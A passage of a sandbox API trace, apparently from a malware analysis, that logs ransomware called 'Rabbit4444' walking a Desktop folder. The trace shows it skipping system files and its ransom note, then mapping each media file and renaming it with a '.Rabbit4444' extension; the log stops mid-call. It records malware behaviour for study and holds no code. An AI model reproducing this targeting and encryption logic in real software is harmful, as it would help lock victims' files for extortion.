[0049.982] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop") returned 23 [0049.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe2cfbde8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71c6ecc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0049.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.982] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.982] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.982] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.982] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe2cfbde8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71c6ecc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.982] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.982] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.982] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.982] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.982] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.982] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe71c6ecc, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe71c6ecc, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71c6ecc, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.982] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.982] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.982] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x674fc490, ftCreationTime.dwHighDateTime=0x1d4cc83, ftLastAccessTime.dwLowDateTime=0x221214d0, ftLastAccessTime.dwHighDateTime=0x1d4d54f, ftLastWriteTime.dwLowDateTime=0x221214d0, ftLastWriteTime.dwHighDateTime=0x1d4d54f, nFileSizeHigh=0x0, nFileSizeLow=0x6648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2-Z3wOJH3aw8Gc23B.m4a", cAlternateFileName="2-Z3WO~1.M4A")) returned 1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2=".") returned 1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="..") returned 1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="windows") returned -1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="bootmgr") returned -1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="pagefile.sys") returned -1 [0049.982] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="boot") returned -1 [0049.983] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="ids.txt") returned -1 [0049.983] lstrcmpiW (lpString1="2-Z3wOJH3aw8Gc23B.m4a", lpString2="NTUSER.DAT") returned -1 [0049.983] lstrcpyW (in: lpString1=0x130eb68, lpString2="2-Z3wOJH3aw8Gc23B.m4a" | out: lpString1="2-Z3wOJH3aw8Gc23B.m4a") returned="2-Z3wOJH3aw8Gc23B.m4a" [0049.983] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2-Z3wOJH3aw8Gc23B.m4a", dwFileAttributes=0x0) returned 1 [0049.983] lstrlenW (lpString="2-Z3wOJH3aw8Gc23B.m4a") returned 21 [0049.983] lstrlenW (lpString="Rabbit4444") returned 10 [0049.983] lstrcmpiW (lpString1="8Gc23B.m4a", lpString2="Rabbit4444") returned -1 [0049.983] lstrlenW (lpString=".dll") returned 4 [0049.983] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.983] lstrlenW (lpString=".lnk") returned 4 [0049.983] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.983] lstrlenW (lpString=".ini") returned 4 [0049.983] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.983] lstrlenW (lpString=".sys") returned 4 [0049.983] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2-Z3wOJH3aw8Gc23B.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2-z3wojh3aw8gc23b.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.983] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.983] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14129422730) returned 1 [0049.984] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=26184) returned 1 [0049.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0049.984] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6950, lpName=0x0) returned 0x298 [0049.984] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6950) returned 0x70000 [0049.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0049.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.985] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0049.985] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14129623973) returned 1 [0049.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0049.986] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.989] CloseHandle (hObject=0x298) returned 1 [0049.989] CloseHandle (hObject=0x278) returned 1 [0049.989] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\2-Z3wOJH3aw8Gc23B.m4a.Rabbit4444") returned 56 [0049.990] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\2-Z3wOJH3aw8Gc23B.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\2-z3wojh3aw8gc23b.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\2-Z3wOJH3aw8Gc23B.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\2-z3wojh3aw8gc23b.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.990] InterlockedExchangeAdd (in: Addend=0xff618, Value=26192 | out: Addend=0xff618) returned 24607216 [0049.990] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3740 [0049.990] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x314a010, ftCreationTime.dwHighDateTime=0x1d4d235, ftLastAccessTime.dwLowDateTime=0x5bb4eb0, ftLastAccessTime.dwHighDateTime=0x1d4d4a9, ftLastWriteTime.dwLowDateTime=0x5bb4eb0, ftLastWriteTime.dwHighDateTime=0x1d4d4a9, nFileSizeHigh=0x0, nFileSizeLow=0x1479a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="41qdC6QgBU.flv", cAlternateFileName="41QDC6~1.FLV")) returned 1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="Rabbit4444.exe") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2=".") returned 1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="..") returned 1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="windows") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="bootmgr") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="pagefile.sys") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="boot") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="ids.txt") returned -1 [0049.990] lstrcmpiW (lpString1="41qdC6QgBU.flv", lpString2="NTUSER.DAT") returned -1 [0049.990] lstrcpyW (in: lpString1=0x130eb68, lpString2="41qdC6QgBU.flv" | out: lpString1="41qdC6QgBU.flv") returned="41qdC6QgBU.flv" [0049.990] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\41qdC6QgBU.flv", dwFileAttributes=0x0) returned 1 [0049.991] lstrlenW (lpString="41qdC6QgBU.flv") returned 14 [0049.991] lstrlenW (lpString="Rabbit4444") returned 10 [0049.991] lstrcmpiW (lpString1="C6QgBU.flv", lpString2="Rabbit4444") returned -1 [0049.991] lstrlenW (lpString=".dll") returned 4 [0049.991] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0049.991] lstrlenW (lpString=".lnk") returned 4 [0049.991] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0049.991] lstrlenW (lpString=".ini") returned 4 [0049.991] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0049.991] lstrlenW (lpString=".sys") returned 4 [0049.991] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0049.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\41qdC6QgBU.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\41qdc6qgbu.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.991] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.991] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14130185925) returned 1 [0049.991] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83866) returned 1 [0049.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0049.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0049.991] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14aa0, lpName=0x0) returned 0x298 [0049.991] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14aa0) returned 0x70000 [0049.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.994] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14130455477) returned 1 [0049.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0049.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0049.994] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.995] CloseHandle (hObject=0x298) returned 1 [0049.995] CloseHandle (hObject=0x278) returned 1 [0049.996] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\41qdC6QgBU.flv.Rabbit4444") returned 49 [0049.996] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\41qdC6QgBU.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\41qdc6qgbu.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\41qdC6QgBU.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\41qdc6qgbu.flv.rabbit4444"), dwFlags=0x1) returned 1 [0049.996] InterlockedExchangeAdd (in: Addend=0xff618, Value=83872 | out: Addend=0xff618) returned 24633408 [0049.996] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3742 [0049.996] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89328380, ftCreationTime.dwHighDateTime=0x1d4cafe, ftLastAccessTime.dwLowDateTime=0x842c5790, ftLastAccessTime.dwHighDateTime=0x1d4c7ba, ftLastWriteTime.dwLowDateTime=0x842c5790, ftLastWriteTime.dwHighDateTime=0x1d4c7ba, nFileSizeHigh=0x0, nFileSizeLow=0xa125, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4F1Tg Snje_K.m4a", cAlternateFileName="4F1TGS~1.M4A")) returned 1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2=".") returned 1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="..") returned 1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="windows") returned -1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="bootmgr") returned -1 [0049.996] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="pagefile.sys") returned -1 [0049.997] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="boot") returned -1 [0049.997] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="ids.txt") returned -1 [0049.997] lstrcmpiW (lpString1="4F1Tg Snje_K.m4a", lpString2="NTUSER.DAT") returned -1 [0049.997] lstrcpyW (in: lpString1=0x130eb68, lpString2="4F1Tg Snje_K.m4a" | out: lpString1="4F1Tg Snje_K.m4a") returned="4F1Tg Snje_K.m4a" [0049.997] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4F1Tg Snje_K.m4a", dwFileAttributes=0x0) returned 1 [0049.997] lstrlenW (lpString="4F1Tg Snje_K.m4a") returned 16 [0049.997] lstrlenW (lpString="Rabbit4444") returned 10 [0049.997] lstrcmpiW (lpString1="Snje_K.m4a", lpString2="Rabbit4444") returned 1 [0049.997] lstrlenW (lpString=".dll") returned 4 [0049.997] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.997] lstrlenW (lpString=".lnk") returned 4 [0049.997] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.997] lstrlenW (lpString=".ini") returned 4 [0049.997] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.997] lstrlenW (lpString=".sys") returned 4 [0049.997] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.997] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4F1Tg Snje_K.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\4f1tg snje_k.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.997] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.997] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14130805358) returned 1 [0049.997] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41253) returned 1 [0049.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.997] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0049.997] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa430, lpName=0x0) returned 0x298 [0049.998] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa430) returned 0x70000 [0049.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.999] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.999] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.000] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14131034638) returned 1 [0050.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0050.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0050.000] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.000] CloseHandle (hObject=0x298) returned 1 [0050.000] CloseHandle (hObject=0x278) returned 1 [0050.001] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\4F1Tg Snje_K.m4a.Rabbit4444") returned 51 [0050.001] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\4F1Tg Snje_K.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\4f1tg snje_k.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\4F1Tg Snje_K.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\4f1tg snje_k.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.001] InterlockedExchangeAdd (in: Addend=0xff618, Value=41264 | out: Addend=0xff618) returned 24717280 [0050.001] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3744 [0050.001] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a111350, ftCreationTime.dwHighDateTime=0x1d4c8f3, ftLastAccessTime.dwLowDateTime=0x619504a0, ftLastAccessTime.dwHighDateTime=0x1d4cd2f, ftLastWriteTime.dwLowDateTime=0x619504a0, ftLastWriteTime.dwHighDateTime=0x1d4cd2f, nFileSizeHigh=0x0, nFileSizeLow=0x183f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4OW_EMMxH1R6Pq3.gif", cAlternateFileName="4OW_EM~1.GIF")) returned 1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="Rabbit4444.exe") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2=".") returned 1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="..") returned 1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="windows") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="bootmgr") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="pagefile.sys") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="boot") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="ids.txt") returned -1 [0050.002] lstrcmpiW (lpString1="4OW_EMMxH1R6Pq3.gif", lpString2="NTUSER.DAT") returned -1 [0050.002] lstrcpyW (in: lpString1=0x130eb68, lpString2="4OW_EMMxH1R6Pq3.gif" | out: lpString1="4OW_EMMxH1R6Pq3.gif") returned="4OW_EMMxH1R6Pq3.gif" [0050.002] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4OW_EMMxH1R6Pq3.gif", dwFileAttributes=0x0) returned 1 [0050.002] lstrlenW (lpString="4OW_EMMxH1R6Pq3.gif") returned 19 [0050.002] lstrlenW (lpString="Rabbit4444") returned 10 [0050.002] lstrcmpiW (lpString1="1R6Pq3.gif", lpString2="Rabbit4444") returned -1 [0050.002] lstrlenW (lpString=".dll") returned 4 [0050.002] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0050.002] lstrlenW (lpString=".lnk") returned 4 [0050.002] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0050.002] lstrlenW (lpString=".ini") returned 4 [0050.002] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0050.002] lstrlenW (lpString=".sys") returned 4 [0050.002] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0050.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4OW_EMMxH1R6Pq3.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\4ow_emmxh1r6pq3.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.003] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.003] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14131331933) returned 1 [0050.003] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=99313) returned 1 [0050.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0050.003] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18700, lpName=0x0) returned 0x298 [0050.003] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18700) returned 0x70000 [0050.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.005] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14131619198) returned 1 [0050.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0050.006] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.007] CloseHandle (hObject=0x298) returned 1 [0050.007] CloseHandle (hObject=0x278) returned 1 [0050.007] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\4OW_EMMxH1R6Pq3.gif.Rabbit4444") returned 54 [0050.007] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\4OW_EMMxH1R6Pq3.gif" (normalized: 